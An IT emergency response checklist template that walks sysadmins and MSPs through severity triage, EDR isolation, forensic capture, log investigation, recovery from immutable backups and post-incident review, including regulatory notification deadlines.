Workflow Templates for Systems Administration: IT Emergency Response Checklist

Initial Response

Confirm the incident and classify severity

Validate the alert is a true incident, not a false positive from EDR or SIEM. SEV1 means active business impact or confirmed compromise of production or sensitive data; SEV2 is contained or single-system; SEV3 is suspicious activity under investigation. Severity drives paging and stakeholder notification cadence.

Page the on-call IR team

Page through PagerDuty / Opsgenie using the security-incident escalation policy — not the standard ops rotation. For MSPs, page the client's named technical contact in parallel per the MSA. Acknowledge the page in writing so the audit trail is clean.

Notify executive leadership and legal

For SEV1 only: notify the CIO/CISO, General Counsel, and the breach coach (outside counsel) before any external communication. Counsel directs the investigation under privilege; getting this order wrong is a common evidentiary mistake that costs privilege downstream.

Open the incident bridge and assign IC

Stand up the dedicated incident channel in Slack/Teams and the voice bridge. Name an Incident Commander, a Scribe, and a Communications Lead — separate roles, even if the team is small. The IC owns decisions; the Scribe owns the timeline.

Identify the incident type

Initial classification drives the containment playbook. Ransomware triggers immediate forensic capture before any reboot; account compromise triggers session revocation; network intrusion triggers segment isolation. Reclassify later as evidence develops — record the initial call.

Containment and Mitigation

Isolate affected endpoints via EDR

Use CrowdStrike Falcon, SentinelOne, or Defender for Endpoint network-isolation feature — keeps the host reachable to the EDR console while severing all other traffic. Do not power off ransomware-infected hosts; volatile memory is evidence.

Capture forensic images and memory

For ransomware and confirmed compromise: capture RAM (WinPMEM, Magnet RAM Capture) and a disk image (FTK Imager, dd) before any remediation. Store with chain-of-custody documentation. Skipping this is the most common reason post-incident attribution fails.

Disable compromised accounts in Entra ID

Disable the account, revoke all active sessions and refresh tokens, and reset MFA methods. Audit and remove any inbox forwarding rules or app consents granted by the user — attackers frequently set forwarding rules for persistence even after the password is rotated.

Block IOCs at the firewall and proxy

Push C2 domains, malicious IPs, and known-bad hashes to the perimeter firewall (FortiGate, Palo Alto), DNS filter (Umbrella, DNSFilter), and EDR custom IOCs. Coordinate with threat intel feeds to add hashes to org-wide blocklists.

Communicate containment status

Communications Lead posts a status update to leadership and (per legal direction) to affected business units. Stick to confirmed facts; speculation in writing has discovery implications. Set the cadence — typically every 2 hours during active SEV1 response.

Investigation and Analysis

Pull SIEM logs for the incident window

Query Splunk / Sentinel / QRadar for authentication events, EDR detections, firewall flows, and DNS over the suspected dwell-time window — extend the window backward at least 30 days from the first detection. Export and preserve the queries and result sets.

Analyze EDR process telemetry and trees

Walk parent-child process relationships from the first EDR detection. Look for living-off-the-land binaries (PowerShell, certutil, mshta), credential access (lsass dumps), and lateral-movement indicators (PsExec, WMI, RDP from atypical sources).

Interview impacted users and admins

Walk the user(s) through what they clicked, opened, or installed. Ask about MFA prompts they didn't initiate (push-bombing) and unusual emails. Interview admins for any recent unscheduled changes. Document under counsel direction to preserve privilege.

Determine root cause and attack vector

Common vectors: phishing → credential theft → MFA fatigue, exposed RDP, unpatched VPN/edge appliance, third-party SaaS compromise, malicious browser extension. Tie the root-cause statement to specific log evidence — vague conclusions undermine the post-mortem.

Confirm whether data was exfiltrated

Review egress NetFlow, DLP alerts, and cloud audit logs (M365 Unified Audit, Google Workspace Admin) for unusual download volumes or external sharing. A confirmed exfiltration triggers regulatory notification clocks under GDPR (72 hours), HIPAA, and state breach laws.

Recovery and Restoration

Rebuild systems from immutable backups

Restore from a backup dated before the earliest known compromise indicator — not just the most recent. Use Veeam / Datto / Rubrik immutable copies with object lock; restoring from a writable backup that the attacker also touched is the textbook ransomware reinfection mistake.

Rotate credentials and service secrets

Rotate krbtgt twice, all Domain Admin / Tier 0 passwords, service account passwords, API keys, app registration secrets, and any shared MSP vault credentials touching the affected client. Skipping krbtgt rotation leaves Golden Ticket persistence intact.

Validate integrity with vulnerability scan

Run a Tenable / Qualys / Rapid7 authenticated scan on rebuilt hosts before returning them to production. Confirm EDR is reinstalled and reporting healthy, patches are current, and no unauthorized local admin accounts exist on the rebuild.

Restore production access in stages

Phase users back in: pilot group first (1-2 hours of monitoring), then department, then org-wide. Watch EDR and SIEM dashboards during each phase for re-emergence of IOCs. Have rollback to isolation ready.

Communicate restoration to stakeholders

Send the all-clear notice through the Communications Lead. For MSPs, deliver a written restoration confirmation to the client per the MSA. Note any residual restrictions still in place (e.g., VPN limited to known IP ranges).

Post-Incident Review

Schedule the blameless post-mortem

Schedule within 7 days while memory is fresh. Include the IC, Scribe, all responders, and a leadership observer. Distribute the timeline-of-events document beforehand so the meeting is analysis, not recap.

Run the post-mortem and capture findings

Walk the timeline; identify what worked, what didn't, and what was missing. Frame findings as system or process failures, not individual mistakes — blame culture poisons future reporting. Capture concrete owned action items with due dates.

File the final incident report

Write the executive-readable report covering scope, timeline, root cause, impact, remediation, and follow-up. This document feeds SOC 2 evidence, cyber insurance claims, and (if applicable) regulatory submissions. Get sign-off from counsel before circulation.

Update runbooks and IR playbooks

Translate the action items into edits to the IR plan, SOAR playbooks, and detection rules. Add SIEM detections for the IOCs and TTPs observed. Add the scenario to the next tabletop exercise rotation.

Brief leadership on regulatory notifications

Coordinate with counsel on notification obligations: GDPR (72 hours from awareness), HIPAA (60 days for affected individuals, immediate for 500+), state breach laws (varies, generally 30-90 days), SEC cyber disclosure (4 business days for material incidents at public companies). Track each obligation with its deadline.